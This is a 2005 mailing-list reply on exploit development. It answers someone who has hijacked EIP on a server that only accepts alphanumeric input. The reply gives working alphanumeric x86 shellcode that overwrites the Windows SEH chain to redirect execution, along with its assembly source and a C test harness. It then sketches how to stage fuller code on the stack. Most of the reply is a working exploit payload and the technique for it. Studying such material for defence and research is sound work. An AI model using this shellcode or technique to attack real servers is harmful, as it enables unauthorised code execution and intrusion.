Vulnerability Development mailing list archives
Re: AlphaNumeric Exploitation Help
From: Costin Ionescu <costin.ionescu () gmail com>
Date: Fri, 27 May 2005 09:52:36 +0100
On 26 May 2005 11:38:25 -0000, ramatkal () hotmail com <ramatkal () hotmail com> wrote:
I am trying to exploit a vulnerable server which only allows alphanumeric characters.... I have successfully taken control of EIP and now need to do a JUMP -600 bytes..... The problem is, that 'eb' and 'e9' are not alphanumeric asci codes and thus cannot be used to do the jumps in the payload.... Anyone got any ideas/tricks/advice on how i can accomplish a JMP -600 bytes, or any type of jump for that matter, only using alphanumeric chars?
I assume you're exploiting a IA32 machine running Windows. I also assume that you know the address where you want to jump to - let's say you have it in ECX. Here's the code assembled: %!!!!%@@@@P_d38d18QWd1 l And the source: and eax, 21212121h and eax, 40404040h ; eax = 0 push eax pop edi ; edi = 0 xor edi, [fs:eax] ; edi = last SEH frame xor [fs:eax], edi ; fs:[0] = 0 push ecx ; where you want to jump to push edi ; previous SEH frame xor [fs:eax], esp ; set the new SEH frame insb ; crash to run your SEH Here's also a small C code to test this: #include <stdio.h> typedef void (__fastcall * FN) (void* addr); void kaboom () { printf("kaboom\n"); exit(0); } char* shell = "%!!!!%@@@@P_d38d18QWd1 l"; void main (void) { FN f = (FN) shell; f(&kaboom); } Now, if you don't know the address where you want to jump to, you must instead know the address of your code to compute the jump target. If you don't know that either, you generate your code on the stack (using nice alphanumeric opcodes), use the method above to pass control to it (setting before ecx to esp). You can generate the code on the stack to use the full instruction set so from there it gets really boring ;-) Cheers, Costin
Current thread:
- AlphaNumeric Exploitation Help ramatkal (May 26)
- Re: AlphaNumeric Exploitation Help KF (lists) (May 26)
- Re: AlphaNumeric Exploitation Help Felix Lindner (May 26)
- Re: AlphaNumeric Exploitation Help Costin Ionescu (May 27)
- <Possible follow-ups>
- RE: AlphaNumeric Exploitation Help Stejerean, Cosmin (May 26)
- Re: AlphaNumeric Exploitation Help 6d79676d61696c6163636f756e74 (May 26)